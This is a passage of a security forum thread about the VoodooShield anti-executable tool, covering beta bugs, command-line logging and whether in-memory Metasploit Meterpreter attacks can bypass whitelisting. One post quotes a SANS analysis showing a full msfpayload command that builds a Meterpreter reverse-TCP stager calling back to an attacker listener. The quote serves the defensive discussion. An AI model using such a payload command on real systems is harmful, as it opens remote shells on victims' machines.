VoodooShield ?

Discussion in 'other anti-malware software' started by CloneRanger, Dec 7, 2011.

  1. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Thank you, and obviously we appreciate this very much too ;).
     
  2. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    13,790
    Location:
    The Netherlands
    Can you tell a bit more about this, isn't this in fact comparable with in-memory malware? The payload (meterpreter) works from inside the exploited process, and that's why anti-exe can't block it, am I correct?
     
  3. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Do you guys maybe want to start a new thread and have a general discussion about this? I do think it is an important topic to discuss, but I think if we start a new thread, other developers will be more comfortable in joining the conversation and offering their valuable insights? Just a thought!
     
  4. schmidthouse

    schmidthouse Registered Member

    Joined:
    Aug 18, 2015
    Posts:
    26
    Location:
    Sunny Okanagan Valley Canada
    Curious, is there an 'envisioned' time table for when Release version 3 will be available through GUI upgrade from v. 2.75 (ie: weeks, months, a year.)
     
  5. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Vlad will be able to give you a better idea than I can when he returns from vacation, but I imagine a month or so. Thank you!
     
  6. Triple Helix

    Triple Helix Specialist

    Joined:
    Nov 20, 2004
    Posts:
    12,991
    Location:
    Ontario, Canada
    Dan look for an email!

    Daniel ;)
     
  7. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    13,790
    Location:
    The Netherlands
    There is already a thread over here:

    https://www.wilderssecurity.com/thre...r-edetection-any-antimalware-software.379698/
     
  8. schmidthouse

    schmidthouse Registered Member

    Joined:
    Aug 18, 2015
    Posts:
    26
    Location:
    Sunny Okanagan Valley Canada
    No, Thank you!
     
  9. hjlbx

    hjlbx Guest

    This is not unusual behavior for any AV. The log is not showing the complete details.

    Right now, there is problem with VS not recording complete command lines. (e.g. VS does not log all blocked command lines, there is no real-time list of command lines)

    There is problem with VS not alerting user about block actions in some instances.

    There is no way to lookup blocks and white-list if legitimate (e.g. select command line block from real-time list, add to white list).

    Big usability problem...
     
  10. hjlbx

    hjlbx Guest

    No. Someone needs to provide a verifiable sample or PoC... because until someone can prove a bypass with an actual sample - that is verified by others via testing - it is nothing but speculation. Another discussion is going to only degenerate into another messy debate and verbal melee \ flame war...
     
  11. Baldrick

    Baldrick Registered Member

    Joined:
    May 11, 2002
    Posts:
    2,561
    Location:
    South Wales, UK
    Completely agree with that...and as you say best we avoid going any further with discussions along those lines.
     
  12. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    4,306
    Location:
    Under a bushel ...
    Win 7 - VS in Smart Mode.
    I get one of these whenever I open Explorer? VS.png
    Edit: 3.02 Beta
     
    Last edited: Oct 9, 2015
  13. TNO_sec

    TNO_sec Registered Member

    Joined:
    Sep 26, 2010
    Posts:
    47
    Basically yes, except Metasploit Meterpreter does not need any actual malware. Hence there is no file being executed and nothing for an anti-executable to detect.

    With that said, I agree with Dan that if more debate about this is needed, it should be done in a new thread. Please point me to it if you decide to create one.

    For those still asking for “proof”, I'll copy-paste my previous reply #8052:
    “To those wanting some sort of "proof" I will point out that this method is nothing fancy. It's out there for all to see. It's basically just how a Metasploit interpreter works. Metasploit is build into Kali Linux which is completely free, so anyone who knows how to use Metasploit should be able to reproduce it. Not that I see why it would be needed. After all, when there is no executable, how is an anti-executable supposed to block the attack?”
     
  14. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,269
    Location:
    U.S.A.
    Great article here on explaining how Meterpreter works: https://www.sans.org/reading-room/whitepapers/forensics/analysis-meterpreter-post-exploitation-35537

    -EDIT- The key to stopping this is by detecting the stager. After that it's game over since everything thereafter is done in memory.

    Analysis began with the stager, which was created by the msfpayload utility shown below. This command will embed a Metasploit payload into several formats including code such as C and JS as well as executables and DLLs. The stager executable is small, just over 70K, regardless of the transport method selected.


    root@kali:~# msfpayload windows/meterpreter/reverse_tcp
    LHOST=192.168.36.128 LPORT=9002 X >
    ./payloads/meterpreter_reverse_tcp.exe


    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 287
    Options: {"LHOST"=>"192.168.36.128", "LPORT"=>"9002”}


     
    Last edited: Oct 9, 2015
  15. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
  16. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Not surprising. Anyone using a smart phone is already infected by stuff that allows all the snoops to turn on the microphone when the phone is off, and listen to what is being said. Only solution is to go back to the days when a cellphone was just a phone, and not "smart". Not likely to happen.
     
  17. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,269
    Location:
    U.S.A.
    I still use my 12 year old pay-as-you-go Verizon cell phone. All I have to do is pay at least $5 a month and I keep all my rollover minutes. Actually, it still has the original battery in the thing. It has excellent reception all over the U.S..
     
  18. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Or they can lock the device while a web app is running, right ;).
     
  19. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Yeah, that would be even better!
     
  20. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Sorry about that... Vlad will be back tomorrow and he will most likely focus on the command lines. Do you guys remember how I had a difficult time getting the command lines just right? And actually, I never did get them just right in VS 2.86. So the command lines are kind of in a transition while he reworks the code, so it may take a week or two to work everything out and get them working perfectly.
     
  21. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Yeah, it will be a very interesting discussion, hopefully with a healthy dose of PoC's. I really would like to see what other developers and exploit experts think as well.
     
  22. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Yeah, it is essentially the same thing as the cmd issue that I could never get exactly right, but he will fix it, I promise ;).
     
  23. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Nope. You can turn it off and the spooks can turn on the microphone and listen. No POC's on this stuff. It's the "BIG" boys.
     
  24. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    I am talking about executable malware, like the example in the video that I posted... in the video, she says “One thing to remember is that these infections got on these iPhones by users clicking on a link to download an app to their iPhone, not from users downloading things from the App Store.”

    In iOS, Apps must be approved for the camera and mic to have access. Whether this can be exploited or not, who knows?

    If turning the lock off is a concern, then you either add an additional deny by default prompt, or just hide the desktop shield gadget altogether (for novices).

    Either way, I believe that the device should be locked when a web app is running, and unlocked when all of the web apps are closed, so that the device is usable. Keep in mind, the lock can include other locking mechanisms other than whitelisting... like anti-exploit, etc, but the core locking mechanism should be whitelisting in my opinion. Also, keep in mind, currently iOS 8 and below essentially blocks any apps that are not provided by the app store, which is not unlike blocking by digital signature... which is exactly why VS does not allow by digital signature, unless the initial parent process is allowed.

    According to the video, it sounds like Apple added additional protections in iOS 9, so for now this issue is fixed... so I would be curious what these protections are, and how effective they are compared to whitelisting and auto building the whitelist with toggling / snapshots.
     
    Last edited: Oct 10, 2015
  25. singularity

    singularity Registered Member

    Joined:
    Mar 6, 2014
    Posts:
    76
    Location:
    India
    I am 3.02 beta.. whitelisted and took snapshot.. but whenever I right click to open the folder in internet download manager for a downloaded item.. i get this.. I have allowed it n times.
    http://nium.co/images/f429afaebc.png
    should I white list rundll in settings?
     
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.